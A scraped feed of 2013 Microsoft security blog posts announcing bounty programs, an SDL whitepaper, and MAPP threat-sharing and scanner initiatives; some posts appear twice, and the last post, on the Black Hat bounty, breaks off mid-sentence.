leaves turn colors and the temperatures cool off, I&rsquo;m happy to be sharing the bountiful harvest of our programs, started as seeds planted in early summer. It&rsquo;s been a great first three months of Microsoft&rsquo;s bounty programs, and we&rsquo;re overjoyed that our programs have been met with great participation and enthusiasm from the hacker community.</p> <p>Stay tuned for more news coming soon!</p> <p>Katie Moussouris<br />Senior Security Strategist, Microsoft Security Response Center<br /><a href="https://twitter.com/k8em0">http://twitter.com/k8em0</a> &nbsp;(that&rsquo;s a zero)</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3600645&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1">bountyprogramsZero-Day ExploitBounty New Whitepaper on SDL adoptionhttp://blogs.msdn.com/b/sdl/archive/2013/09/19/new-whitepaper-on-sdl-adoption.aspxThu, 19 Sep 2013 17:19:49 GMT91d46819-8472-40ad-a661-2c78acb4018c:10450555SDL Team2http://blogs.msdn.com/b/sdl/rsscomments.aspx?WeblogPostID=10450555http://blogs.msdn.com/b/sdl/archive/2013/09/19/new-whitepaper-on-sdl-adoption.aspx#comments<p><span style="color: #333333; font-family: 'Segoe UI','sans-serif'; mso-ansi-language: EN;" lang="EN">Arjuna Shunn here.&nbsp; Our friends over on the <a href="http://blogs.technet.com/b/security/">security blog</a> have just released a new whitepaper discussing the value of SDL in the financial sector.&nbsp; Feel free to take a look and grab the whitepaper, it is definitely worth taking the time to read through and see how the Microsoft SDL has helped the financial services industry and can help other industries as well.</span></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10450555" width="1" height="1"> MAPP Initiatives Update – Knowledge Exchange Platformhttp://blogs.technet.com/b/bluehat/archive/2013/09/16/mapp-initiatives-update-knowledge-exchange-platform.aspxMon, 16 Sep 2013 16:45:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:0d0c38e0-8d3f-4b48-8687-d0aa9211eab1BlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3596971http://blogs.technet.com/b/bluehat/archive/2013/09/16/mapp-initiatives-update-knowledge-exchange-platform.aspx#comments<p><span style="font-family: Calibri; font-size: small;">A little more than a month ago, </span><a href="http://blogs.technet.com/b/bluehat/archive/2013/07/29/new-mapp-initiatives.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">we announced some new initiatives</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> for the Microsoft Active Protections Program (MAPP). One of those announcements was &ldquo;MAPP for Responders.&rdquo; The initial response has been extremely positive, so we wanted to provide more information on how we are moving this program forward. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Since the announcement, we&rsquo;ve been working towards launching two initiatives as a single beta with a limited set of customers and partners. The first is the pilot of the MAPP Scanner service that we previously announced.&nbsp; The second initiative is a beta of a completely new automated knowledge exchange platform. We alluded to this platform in our first post and want to give some additional details on this project.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">Simply put, this is a distributed platform that runs as a web service that provides the ability to automate the sharing and consumption of threat information in machine readable formats. As mentioned before, the platform supports the </span><a href="http://stix.mitre.org/"><span style="color: #0563c1; font-family: Calibri; font-size: small;">STIX</span></a><span style="font-family: Calibri; font-size: small;"> and </span><a href="http://taxii.mitre.org/"><span style="color: #0563c1; font-family: Calibri; font-size: small;">TAXII</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> open specifications developed by MITRE, but it has been designed to support any message exchange services and message formats that partners decide to implement. This helps to accomplish multiple goals, but here are two highlights:</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">First, the platform will empower the industry by facilitating the sharing of threat information and enabling knowledge exchange scenarios that do not exist today. As a platform, customers and partners will have the flexibility to share and consume data with granular control. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Second, the platform has been designed to be extremely extensible, with a modular plugin architecture that will allow for an unlimited number of services to be built on top of and supported by it. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Figures 1 &ndash; 3 illustrate some of the sharing scenarios enabled by the platform:</span></span></p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/2311.figure1.png"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/2311.figure1.png" alt="" width="213" height="144" border="0" /></a>&nbsp;</p> <p><em><span style="color: #44546a;"><span style="font-family: Calibri;">Figure 1 Publisher Subscriber</span></span></em></p> <p>&nbsp;<a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/4846.figure2.png"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/4846.figure2.png" alt="" width="153" height="155" border="0" /></a></p> <p><em><span style="color: #44546a;"><span style="font-family: Calibri;">Figure 2 Peer to Peer</span></span></em></p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/2620.figure3.png"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/2620.figure3.png" alt="" width="224" height="149" border="0" /></a>&nbsp;</p> <p><em><span style="color: #44546a;"><span style="font-family: Calibri;">Figure 3 Hub and Spoke</span></span></em></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">We have designed this platform to integrate into existing environments acting as an interchange point between both external and internal services and data formats. The platform enables real-time information sharing, and because the data is machine-readable, organizations can choose to automatically push the data into their network protection systems. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">I mentioned a limited beta with qualified customers and partners and wanted to list some of the criteria for participation. In addition to being able to sign required agreements and having a dedicated incident response team, participants in the initial beta will be required to provide a feed of threat data into the system. The beta will operate in phases with each lasting approximately 3 months. We expect to conduct three to four phases, expanding to more participants as we progress.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">Many customers have already contacted us concerning participation and we will be following up with all of you very soon. For those enterprise customers who are interested in finding out more, the best path is to talk to your Microsoft Technical Account Manager (TAM). Other incident responders can send a note to </span><a href="mailto:mapp@microsoft.com"><span style="color: #0563c1; font-family: Calibri; font-size: small;">mapp@microsoft.com</span></a><span style="font-size: small;"><span style="font-family: Calibri;">. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Keep an eye on this blog for future updates and announcements. We expect this work to go on for several months and are looking forward to input from participants to help shape the future of automated knowledge exchange. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Regards,</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Jerry Bryant<br /> Senior Security Strategist Lead<br /> Microsoft Trustworthy Computing </span></span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3596971&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1">Community-based DefenseMicrosoft Active Protections Program (MAPP) MAPP Initiatives Update – Knowledge Exchange Platformhttp://blogs.technet.com/b/bluehat/archive/2013/09/16/mapp-initiatives-update-knowledge-exchange-platform.aspxMon, 16 Sep 2013 16:45:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:0d0c38e0-8d3f-4b48-8687-d0aa9211eab1BlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3596971http://blogs.technet.com/b/bluehat/archive/2013/09/16/mapp-initiatives-update-knowledge-exchange-platform.aspx#comments<p><span style="font-family: Calibri; font-size: small;">A little more than a month ago, </span><a href="http://blogs.technet.com/b/bluehat/archive/2013/07/29/new-mapp-initiatives.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">we announced some new initiatives</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> for the Microsoft Active Protections Program (MAPP). One of those announcements was &ldquo;MAPP for Responders.&rdquo; The initial response has been extremely positive, so we wanted to provide more information on how we are moving this program forward. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Since the announcement, we&rsquo;ve been working towards launching two initiatives as a single beta with a limited set of customers and partners. The first is the pilot of the MAPP Scanner service that we previously announced.&nbsp; The second initiative is a beta of a completely new automated knowledge exchange platform. We alluded to this platform in our first post and want to give some additional details on this project.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">Simply put, this is a distributed platform that runs as a web service that provides the ability to automate the sharing and consumption of threat information in machine readable formats. As mentioned before, the platform supports the </span><a href="http://stix.mitre.org/"><span style="color: #0563c1; font-family: Calibri; font-size: small;">STIX</span></a><span style="font-family: Calibri; font-size: small;"> and </span><a href="http://taxii.mitre.org/"><span style="color: #0563c1; font-family: Calibri; font-size: small;">TAXII</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> open specifications developed by MITRE, but it has been designed to support any message exchange services and message formats that partners decide to implement. This helps to accomplish multiple goals, but here are two highlights:</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">First, the platform will empower the industry by facilitating the sharing of threat information and enabling knowledge exchange scenarios that do not exist today. As a platform, customers and partners will have the flexibility to share and consume data with granular control. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Second, the platform has been designed to be extremely extensible, with a modular plugin architecture that will allow for an unlimited number of services to be built on top of and supported by it. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Figures 1 &ndash; 3 illustrate some of the sharing scenarios enabled by the platform:</span></span></p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/2311.figure1.png"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/2311.figure1.png" alt="" width="213" height="144" border="0" /></a>&nbsp;</p> <p><em><span style="color: #44546a;"><span style="font-family: Calibri;">Figure 1 Publisher Subscriber</span></span></em></p> <p>&nbsp;<a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/4846.figure2.png"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/4846.figure2.png" alt="" width="153" height="155" border="0" /></a></p> <p><em><span style="color: #44546a;"><span style="font-family: Calibri;">Figure 2 Peer to Peer</span></span></em></p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/2620.figure3.png"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/2620.figure3.png" alt="" width="224" height="149" border="0" /></a>&nbsp;</p> <p><em><span style="color: #44546a;"><span style="font-family: Calibri;">Figure 3 Hub and Spoke</span></span></em></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">We have designed this platform to integrate into existing environments acting as an interchange point between both external and internal services and data formats. The platform enables real-time information sharing, and because the data is machine-readable, organizations can choose to automatically push the data into their network protection systems. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">I mentioned a limited beta with qualified customers and partners and wanted to list some of the criteria for participation. In addition to being able to sign required agreements and having a dedicated incident response team, participants in the initial beta will be required to provide a feed of threat data into the system. The beta will operate in phases with each lasting approximately 3 months. We expect to conduct three to four phases, expanding to more participants as we progress.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">Many customers have already contacted us concerning participation and we will be following up with all of you very soon. For those enterprise customers who are interested in finding out more, the best path is to talk to your Microsoft Technical Account Manager (TAM). Other incident responders can send a note to </span><a href="mailto:mapp@microsoft.com"><span style="color: #0563c1; font-family: Calibri; font-size: small;">mapp@microsoft.com</span></a><span style="font-size: small;"><span style="font-family: Calibri;">. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Keep an eye on this blog for future updates and announcements. We expect this work to go on for several months and are looking forward to input from participants to help shape the future of automated knowledge exchange. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Regards,</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Jerry Bryant<br /> Senior Security Strategist Lead<br /> Microsoft Trustworthy Computing </span></span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3596971&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1">Community-based DefenseMicrosoft Active Protections Program (MAPP) New MAPP Initiatives http://blogs.technet.com/b/bluehat/archive/2013/07/29/new-mapp-initiatives.aspxMon, 29 Jul 2013 16:58:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:1ed8ac72-c7f1-43ae-a9f5-98f36fc8ecf5BlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3587371http://blogs.technet.com/b/bluehat/archive/2013/07/29/new-mapp-initiatives.aspx#comments<p><span style="font-size: small;"><span style="font-family: Calibri;">Hi everyone,</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Some of you may recall the launch of the Microsoft Active Protections Program (MAPP) back in 2008, when we began giving antivirus vendors security bulletin information early, so that they could develop and test signatures for vulnerabilities and be ready to release them when our bulletins were published. MAPP was our answer to a common phrase used back then: &ldquo;Update Tuesday, exploit Wednesday.&rdquo; This was a time when exploit writers had developed full automation for reverse engineering our security updates and building exploits. Security vendors received information at the same time as everyone else and had to then develop and test signatures before applying the updates. MAPP gave the security vendors, the &ldquo;good guys,&rdquo; a head start against the &ldquo;bad guys.&rdquo; In the years since its inception, MAPP has been successful in allowing these vendors to release protections when we release the updates so that our customers have the time they need to test and deploy them. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Along the way, MAPP has also become a key part of our incident response process when we find new exploits in the wild. During these incidents, we are able to help MAPP partners quickly build protections for our common customers by providing them with detailed detection guidance. In most cases, this allows for a significant level of protection for customers while we are working to address the issue with a permanent fix. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Since the program launched, there has been little external change to how it operates. Internally, we have made slight adjustments to how the program is managed but by and large, it is the same program it was in 2008 and the same program our partners still say is essential to their operations. For example:</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;"><em>&ldquo;The MAPP program helps Trend Micro in strengthening further, its defenses against cyber criminals. This timely information sharing works great in providing our customers the best and accurate protection with least false positives,&rdquo; </em>said Raimund Genes, CTO, Trend Micro.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;"><em>&ldquo;The data from MAPP has proven to be a valuable source of information ahead of the curve allowing us to better deliver faster protection against 0-day vulnerabilities to our customers</em>.&rdquo; -- Peter Szabo, Senior Threat Researcher, SophosLabs Canada</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;"><em>&ldquo;MAPP provides us with advanced notification of vulnerabilities, as well as actionable information that allows us to even more quickly build protection for our customers. This saves us significant cycles, and MAPP&rsquo;s valuable information sharing fully supports our threat-centric approach to cybersecurity.&rdquo;</em> - Matt Watchinsksi, Vice President of Vulnerability Research, Sourcefire</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;"> Even with this level of success, we are always evaluating our programs. Today, we are introducing a few changes based on the changing threat landscape and feedback from our partners. </span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">MAPP for Security Vendors</span></span></strong></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">First, in order to have a clear definition of the existing MAPP program and be able to convey how the new programs differ, we are now calling what the world today knows as MAPP, &ldquo;MAPP for Security Vendors.&rdquo; Here is an outline of how the traditional MAPP program will look going forward:</span></span></p> <p><span style="font-family: Calibri; font-size: small;">The MSRC has a history of gathering and acting on feedback from our customers and partners. For example, the </span><a href="http://www.microsoft.com/about/twc/en/us/twcnext/timeline.aspx#2005-01"><span style="color: #0563c1; font-family: Calibri; font-size: small;">Software Update Validation Program (SUVP)</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> allows qualified enterprises to test our security updates in a non-production environment and give us feedback on those updates before we release them. This partnership with our customers extends our internal testing to include many of the custom applications enterprises run in their networks. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">In much the same way, we are implementing <strong>MAPP Validate </strong>as part of MAPP for Security Vendors, which will allow qualified security vendors to give feedback on our detection guidance before distributing it to the broader MAPP community. This is a community-based initiative that will help to streamline the development and use of detection guidance in order to facilitate faster and higher quality protections for customers. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Next, our partners say they are getting clear business value from the one-day head start we give them to develop protections. But sometimes, building, testing, and deploying quality signatures takes additional time. So, on top of streamlining and improving the quality of detection guidance, we are expanding the signature development window from one to three business days for MAPP partners who meet certain stringent criteria. For example, partners must have at least a two-year track record of completing the reporting requirements of the program and a demonstrated willingness to partner back with us as they find new issues in the wild that we need to respond to quickly. Entry-level MAPP partners will still only receive information one day early. As always, we take customer security very seriously. Any partner found to have leaked information, either inadvertently or knowingly, is subject to removal from all parts of the program or, depending on the outcome of an investigation, subject to entry-level status only. </span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">MAPP for Responders</span></span></strong></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Across the industry, it is recognized that targeted attacks are one of the primary threats to enterprises, governments and other entities. Incident responders, including response companies, CSIRTs, ISACs, and security vendors, represent the front lines in the fight to detect, respond, and remediate these attacks. Through this new program, MAPP for Responders, we are working to build new partnerships and community collaborations that will enable strategic knowledge exchange. Microsoft intends to contribute to this effort by sharing threat indicators such as malicious URLs, file hashes, incident data and relevant detection guidance. Employing a &ldquo;give to get&rdquo; model, the community will benefit when data they provide is enriched by aggregating it with data from others. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">How is MAPP for Responders different from MAPP for Security Vendors? At a high level, the former targets detection and remediation while the latter is all about developing protections. The information we plan to share with response partners is focused more on threat intelligence than specifically on vulnerabilities. Where these two programs come together is around incident response. Arming more defenders against targeted attacks is a key part of our overall strategy. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Effective knowledge exchange requires automation and a common format. To accomplish this, we plan to support Mitre&rsquo;s STIX (Structured Threat Information Expression) and TAXII (Trusted Automated eXchange of Indicator Information) specifications. As open specifications for the formatting and transport of information, STIX and TAXII are starting to see broad adoption. Regardless of format, we want to serve customers by facilitating the flow of threat intelligence to organizations who can capitalize on it. As such, we will also seek to build transforms for other commonly used formats. This effort is currently in development and we intend to launch a pilot in the near future. </span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">MAPP Scanner</span></span></strong></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">The MSRC employs some of the brightest engineers in the industry, the sort who&nbsp;build tools such as !exploitable, OffVis, and EMET. MAPP Scanner, currently in a closed pilot program, is a content-based vulnerability scanner developed by our security engineers to aid in investigating incidents. We are introducing MAPP Scanner as a cloud-based service that can be used to scan Office documents, PDF files, Flash movies, and suspect URLs, to determine if they are attempting to exploit a vulnerability. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">MAPP Scanner performs both static and active analysis to determine if files are attempting to exploit a vulnerability. It spins up virtual machines for every supported version of Windows and opens content in supported versions of the appropriate application. MAPP Scanner can help find a known vulnerability and return the CVEs and affected platforms for that issue, while also flagging suspicious activity not associated with a known vulnerability for deeper analysis. As a result, MAPP Scanner is extremely effective in identifying previously unknown vulnerabilities while at the same time dramatically improving the ability and efficiency of responders investigating an incident.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Making this technology available to partners who are likely to be subjected to targeted attacks and those who work with them to investigate and remediate security incidents increases the likelihood of new attacks and attack vectors being discovered. It also aids in the efficiency of investigations which speeds up the process of identifying and deploying the appropriate protections. </span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">Going Forward</span></span></strong></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">As with Microsoft&rsquo;s other security initiatives, such as the BlueHat Prize and our new bounty programs, the mission for MAPP is simple: mitigate entire classes of attack and protect customers. We have a long history of working across many different communities to drive this mission and will continue to do so. We also have a lot of other initiatives we are working on so going forward, you can expect to hear more announcements from us impacting this space. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Jerry Bryant<br /> Senior Security Strategist</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Microsoft Trustworthy Computing </span></span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3587371&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft Active Protections Program (MAPP) New MAPP Initiatives http://blogs.technet.com/b/bluehat/archive/2013/07/29/new-mapp-initiatives.aspxMon, 29 Jul 2013 16:58:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:1ed8ac72-c7f1-43ae-a9f5-98f36fc8ecf5BlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3587371http://blogs.technet.com/b/bluehat/archive/2013/07/29/new-mapp-initiatives.aspx#comments<p><span style="font-size: small;"><span style="font-family: Calibri;">Hi everyone,</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Some of you may recall the launch of the Microsoft Active Protections Program (MAPP) back in 2008, when we began giving antivirus vendors security bulletin information early, so that they could develop and test signatures for vulnerabilities and be ready to release them when our bulletins were published. MAPP was our answer to a common phrase used back then: &ldquo;Update Tuesday, exploit Wednesday.&rdquo; This was a time when exploit writers had developed full automation for reverse engineering our security updates and building exploits. Security vendors received information at the same time as everyone else and had to then develop and test signatures before applying the updates. MAPP gave the security vendors, the &ldquo;good guys,&rdquo; a head start against the &ldquo;bad guys.&rdquo; In the years since its inception, MAPP has been successful in allowing these vendors to release protections when we release the updates so that our customers have the time they need to test and deploy them. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Along the way, MAPP has also become a key part of our incident response process when we find new exploits in the wild. During these incidents, we are able to help MAPP partners quickly build protections for our common customers by providing them with detailed detection guidance. In most cases, this allows for a significant level of protection for customers while we are working to address the issue with a permanent fix. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Since the program launched, there has been little external change to how it operates. Internally, we have made slight adjustments to how the program is managed but by and large, it is the same program it was in 2008 and the same program our partners still say is essential to their operations. For example:</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;"><em>&ldquo;The MAPP program helps Trend Micro in strengthening further, its defenses against cyber criminals. This timely information sharing works great in providing our customers the best and accurate protection with least false positives,&rdquo; </em>said Raimund Genes, CTO, Trend Micro.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;"><em>&ldquo;The data from MAPP has proven to be a valuable source of information ahead of the curve allowing us to better deliver faster protection against 0-day vulnerabilities to our customers</em>.&rdquo; -- Peter Szabo, Senior Threat Researcher, SophosLabs Canada</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;"><em>&ldquo;MAPP provides us with advanced notification of vulnerabilities, as well as actionable information that allows us to even more quickly build protection for our customers. This saves us significant cycles, and MAPP&rsquo;s valuable information sharing fully supports our threat-centric approach to cybersecurity.&rdquo;</em> - Matt Watchinsksi, Vice President of Vulnerability Research, Sourcefire</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;"> Even with this level of success, we are always evaluating our programs. Today, we are introducing a few changes based on the changing threat landscape and feedback from our partners. </span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">MAPP for Security Vendors</span></span></strong></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">First, in order to have a clear definition of the existing MAPP program and be able to convey how the new programs differ, we are now calling what the world today knows as MAPP, &ldquo;MAPP for Security Vendors.&rdquo; Here is an outline of how the traditional MAPP program will look going forward:</span></span></p> <p><span style="font-family: Calibri; font-size: small;">The MSRC has a history of gathering and acting on feedback from our customers and partners. For example, the </span><a href="http://www.microsoft.com/about/twc/en/us/twcnext/timeline.aspx#2005-01"><span style="color: #0563c1; font-family: Calibri; font-size: small;">Software Update Validation Program (SUVP)</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> allows qualified enterprises to test our security updates in a non-production environment and give us feedback on those updates before we release them. This partnership with our customers extends our internal testing to include many of the custom applications enterprises run in their networks. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">In much the same way, we are implementing <strong>MAPP Validate </strong>as part of MAPP for Security Vendors, which will allow qualified security vendors to give feedback on our detection guidance before distributing it to the broader MAPP community. This is a community-based initiative that will help to streamline the development and use of detection guidance in order to facilitate faster and higher quality protections for customers. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Next, our partners say they are getting clear business value from the one-day head start we give them to develop protections. But sometimes, building, testing, and deploying quality signatures takes additional time. So, on top of streamlining and improving the quality of detection guidance, we are expanding the signature development window from one to three business days for MAPP partners who meet certain stringent criteria. For example, partners must have at least a two-year track record of completing the reporting requirements of the program and a demonstrated willingness to partner back with us as they find new issues in the wild that we need to respond to quickly. Entry-level MAPP partners will still only receive information one day early. As always, we take customer security very seriously. Any partner found to have leaked information, either inadvertently or knowingly, is subject to removal from all parts of the program or, depending on the outcome of an investigation, subject to entry-level status only. </span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">MAPP for Responders</span></span></strong></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Across the industry, it is recognized that targeted attacks are one of the primary threats to enterprises, governments and other entities. Incident responders, including response companies, CSIRTs, ISACs, and security vendors, represent the front lines in the fight to detect, respond, and remediate these attacks. Through this new program, MAPP for Responders, we are working to build new partnerships and community collaborations that will enable strategic knowledge exchange. Microsoft intends to contribute to this effort by sharing threat indicators such as malicious URLs, file hashes, incident data and relevant detection guidance. Employing a &ldquo;give to get&rdquo; model, the community will benefit when data they provide is enriched by aggregating it with data from others. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">How is MAPP for Responders different from MAPP for Security Vendors? At a high level, the former targets detection and remediation while the latter is all about developing protections. The information we plan to share with response partners is focused more on threat intelligence than specifically on vulnerabilities. Where these two programs come together is around incident response. Arming more defenders against targeted attacks is a key part of our overall strategy. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Effective knowledge exchange requires automation and a common format. To accomplish this, we plan to support Mitre&rsquo;s STIX (Structured Threat Information Expression) and TAXII (Trusted Automated eXchange of Indicator Information) specifications. As open specifications for the formatting and transport of information, STIX and TAXII are starting to see broad adoption. Regardless of format, we want to serve customers by facilitating the flow of threat intelligence to organizations who can capitalize on it. As such, we will also seek to build transforms for other commonly used formats. This effort is currently in development and we intend to launch a pilot in the near future. </span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">MAPP Scanner</span></span></strong></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">The MSRC employs some of the brightest engineers in the industry, the sort who&nbsp;build tools such as !exploitable, OffVis, and EMET. MAPP Scanner, currently in a closed pilot program, is a content-based vulnerability scanner developed by our security engineers to aid in investigating incidents. We are introducing MAPP Scanner as a cloud-based service that can be used to scan Office documents, PDF files, Flash movies, and suspect URLs, to determine if they are attempting to exploit a vulnerability. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">MAPP Scanner performs both static and active analysis to determine if files are attempting to exploit a vulnerability. It spins up virtual machines for every supported version of Windows and opens content in supported versions of the appropriate application. MAPP Scanner can help find a known vulnerability and return the CVEs and affected platforms for that issue, while also flagging suspicious activity not associated with a known vulnerability for deeper analysis. As a result, MAPP Scanner is extremely effective in identifying previously unknown vulnerabilities while at the same time dramatically improving the ability and efficiency of responders investigating an incident.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Making this technology available to partners who are likely to be subjected to targeted attacks and those who work with them to investigate and remediate security incidents increases the likelihood of new attacks and attack vectors being discovered. It also aids in the efficiency of investigations which speeds up the process of identifying and deploying the appropriate protections. </span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">Going Forward</span></span></strong></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">As with Microsoft&rsquo;s other security initiatives, such as the BlueHat Prize and our new bounty programs, the mission for MAPP is simple: mitigate entire classes of attack and protect customers. We have a long history of working across many different communities to drive this mission and will continue to do so. We also have a lot of other initiatives we are working on so going forward, you can expect to hear more announcements from us impacting this space. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Jerry Bryant<br /> Senior Security Strategist</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Microsoft Trustworthy Computing </span></span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3587371&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft Active Protections Program (MAPP) Preparing for Live Pwnage: Mitigation Bypass Bounty Machine Specs for Black Hathttp://blogs.technet.com/b/bluehat/archive/2013/07/24/preparing-for-live-pwnage-mitigation-bypass-bounty-machine-specs-for-black-hat.aspxWed, 24 Jul 2013 21:39:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:f5471a59-559d-4493-91b7-d48076764326BlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3586679http://blogs.technet.com/b/bluehat/archive/2013/07/24/preparing-for-live-pwnage-mitigation-bypass-bounty-machine-specs-for-black-hat.aspx#comments<p><span style="font-size: small;"><span style="font-family: Calibri;">With about one week to go before we all gather at Black Hat in Las Vegas, we&rsquo;re getting inquiries about precisely how the promised Live Mitigation Bypass Bounty judging at Black Hat will work. For most of the world, it works best when you get a good spot at the Microsoft booth (#301) around noon each day, so you can clearly see the excitement as some of security&rsquo;s best and brightest look to pop built-in Windows 8.1 preview mitigations in truly novel ways. Will one or more talented folk qualify for the $100,000 bounty on new exploitation techniques? We&rsquo;re as eager to find out as you are.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Perhaps <em>you</em> intend to be the first person EVER to qualify for the largest ongoing bounty for new attack techniques offered by any company so far. In that case, allow us to tell you more about the machine you&rsquo;re looking to win. (In addition to $100,000, we&rsquo;ll give anyone able to demonstrate a truly novel mitigation bypass the very computer on which they&rsquo;ve 